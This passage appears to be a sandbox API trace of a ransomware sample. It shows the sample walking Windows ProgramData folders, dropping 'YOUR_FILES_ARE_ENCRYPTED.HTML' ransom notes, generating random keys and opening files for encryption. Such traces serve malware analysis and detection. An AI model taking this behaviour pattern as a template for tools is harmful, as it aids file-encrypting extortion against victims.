nFileSizeHigh=0x0, nFileSizeLow=0x320, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0108.635] StrStrIW (lpFirst="state.rsm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.635] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}\\state.rsm") returned 81 [0108.635] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0108.635] lstrlenW (lpString=".rsm") returned 4 [0108.635] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0108.635] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69df918b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69df918b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x672872b5, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x9e218, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="VC_redist.x64.exe", cAlternateFileName="VC_RED~1.EXE")) returned 1 [0108.635] StrStrIW (lpFirst="VC_redist.x64.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.635] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}\\VC_redist.x64.exe") returned 89 [0108.635] PathFindExtensionW (pszPath="VC_redist.x64.exe") returned=".exe" [0108.635] lstrlenW (lpString=".exe") returned 4 [0108.635] PathFindExtensionW (pszPath="VC_redist.x64.exe") returned=".exe" [0108.635] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69df918b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69df918b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x672872b5, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x9e218, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="VC_redist.x64.exe", cAlternateFileName="VC_RED~1.EXE")) returned 0 [0108.635] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0108.635] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0108.635] GetProcessHeap () returned 0x600000 [0108.635] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a94a8 [0108.636] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0108.737] WriteFile (in: hFile=0x30c, lpBuffer=0x6a94a8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6a94a8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0108.738] CloseHandle (hObject=0x30c) returned 1 [0108.738] GetProcessHeap () returned 0x600000 [0108.738] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a94a8 | out: hHeap=0x600000) returned 1 [0108.738] GetProcessHeap () returned 0x600000 [0108.738] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0108.739] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ec09f7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ec4518, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69ec4518, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508", cAlternateFileName="{7D0B7~1.285")) returned 1 [0108.739] StrStrIW (lpFirst="{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.739] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508") returned 83 [0108.739] GetProcessHeap () returned 0x600000 [0108.739] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0108.740] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508" [0108.740] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\*" [0108.740] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ec09f7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ec4518, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69ec4518, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0108.741] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ec09f7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ec4518, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69ec4518, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="..", cAlternateFileName="")) returned 1 [0108.741] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ec4518, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ec4518, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69ec4518, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 1 [0108.741] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.741] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages") returned 92 [0108.741] GetProcessHeap () returned 0x600000 [0108.741] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0108.742] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages" [0108.742] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\*" [0108.742] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ec4518, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ec4518, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69ec4518, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1928, dwReserved1=0x623f60, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0108.743] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ec4518, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ec4518, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69ec4518, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1928, dwReserved1=0x623f60, cFileName="..", cAlternateFileName="")) returned 1 [0108.743] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ec4518, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ef0491, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69ef0491, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1928, dwReserved1=0x623f60, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0108.743] StrStrIW (lpFirst="vcRuntimeAdditional_amd64", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.743] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64") returned 118 [0108.743] GetProcessHeap () returned 0x600000 [0108.743] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0108.744] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64" [0108.744] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\*" [0108.744] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ec4518, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ef0491, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69ef0491, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0108.744] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ec4518, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ef0491, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69ef0491, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0108.744] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f5b500, ftCreationTime.dwHighDateTime=0x1d5c5bd, ftLastAccessTime.dwLowDateTime=0x4f5b500, ftLastAccessTime.dwHighDateTime=0x1d5c5bd, ftLastWriteTime.dwLowDateTime=0x4f5b500, ftLastWriteTime.dwHighDateTime=0x1d5c5bd, nFileSizeHigh=0x0, nFileSizeLow=0x55f0fd, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0108.744] StrStrIW (lpFirst="cab1.cab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.744] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 127 [0108.744] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0108.744] lstrlenW (lpString=".cab") returned 4 [0108.744] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0108.745] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0108.745] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{7d0b74c2-c3f8-4af1-940f-cd79ab4b2dce}v14.25.28508\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0108.745] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=5632253) returned 1 [0108.745] GetProcessHeap () returned 0x600000 [0108.745] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0108.748] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="70") returned 2 [0108.748] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="D1") returned 2 [0108.748] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="F2") returned 2 [0108.748] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="F7") returned 2 [0108.748] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="40") returned 2 [0108.748] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="1E") returned 2 [0108.748] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="52") returned 2 [0108.748] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="73") returned 2 [0108.748] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="06") returned 2 [0108.748] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="EC") returned 2 [0108.748] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="81") returned 2 [0108.748] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="8F") returned 2 [0108.748] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="9E") returned 2 [0108.748] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="D3") returned 2 [0108.748] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="26") returned 2 [0108.748] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="09") returned 2 [0108.748] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="3C") returned 2 [0108.748] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="55") returned 2 [0108.748] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="D4") returned 2 [0108.748] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="9B") returned 2 [0108.748] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="04") returned 2 [0108.748] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="D4") returned 2 [0108.748] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="A3") returned 2 [0108.748] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="C6") returned 2 [0108.748] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="8B") returned 2 [0108.748] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="5C") returned 2 [0108.748] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="9F") returned 2 [0108.748] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="C2") returned 2 [0108.748] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="8A") returned 2 [0108.748] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="95") returned 2 [0108.748] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="1B") returned 2 [0108.748] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="03") returned 2 [0108.749] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" [0108.749] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0108.749] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0108.749] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54d47c00, ftCreationTime.dwHighDateTime=0x1d5c5bd, ftLastAccessTime.dwLowDateTime=0x54d47c00, ftLastAccessTime.dwHighDateTime=0x1d5c5bd, ftLastWriteTime.dwLowDateTime=0x54d47c00, ftLastWriteTime.dwHighDateTime=0x1d5c5bd, nFileSizeHigh=0x0, nFileSizeLow=0x2d000, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0108.749] StrStrIW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.749] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 147 [0108.749] PathFindExtensionW (pszPath="vc_runtimeAdditional_x64.msi") returned=".msi" [0108.749] lstrlenW (lpString=".msi") returned 4 [0108.749] PathFindExtensionW (pszPath="vc_runtimeAdditional_x64.msi") returned=".msi" [0108.749] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54d47c00, ftCreationTime.dwHighDateTime=0x1d5c5bd, ftLastAccessTime.dwLowDateTime=0x54d47c00, ftLastAccessTime.dwHighDateTime=0x1d5c5bd, ftLastWriteTime.dwLowDateTime=0x54d47c00, ftLastWriteTime.dwHighDateTime=0x1d5c5bd, nFileSizeHigh=0x0, nFileSizeLow=0x2d000, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0108.749] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0108.749] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 148 [0108.749] GetProcessHeap () returned 0x600000 [0108.750] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0108.750] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{7d0b74c2-c3f8-4af1-940f-cd79ab4b2dce}v14.25.28508\\packages\\vcruntimeadditional_amd64\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0108.752] WriteFile (in: hFile=0x314, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0108.753] CloseHandle (hObject=0x314) returned 1 [0108.753] GetProcessHeap () returned 0x600000 [0108.753] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0108.753] GetProcessHeap () returned 0x600000 [0108.753] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0108.754] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ec4518, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ef0491, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69ef0491, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1928, dwReserved1=0x623f60, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0108.754] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0108.754] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0108.754] GetProcessHeap () returned 0x600000 [0108.754] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a94a8 [0108.754] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{7d0b74c2-c3f8-4af1-940f-cd79ab4b2dce}v14.25.28508\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0108.755] WriteFile (in: hFile=0x308, lpBuffer=0x6a94a8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6a94a8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0108.756] CloseHandle (hObject=0x308) returned 1 [0108.756] GetProcessHeap () returned 0x600000 [0108.756] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a94a8 | out: hHeap=0x600000) returned 1 [0108.756] GetProcessHeap () returned 0x600000 [0108.756] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.757] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ec4518, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ec4518, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69ec4518, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 0 [0108.758] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0108.758] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0108.758] GetProcessHeap () returned 0x600000 [0108.758] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a94a8 [0108.758] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package 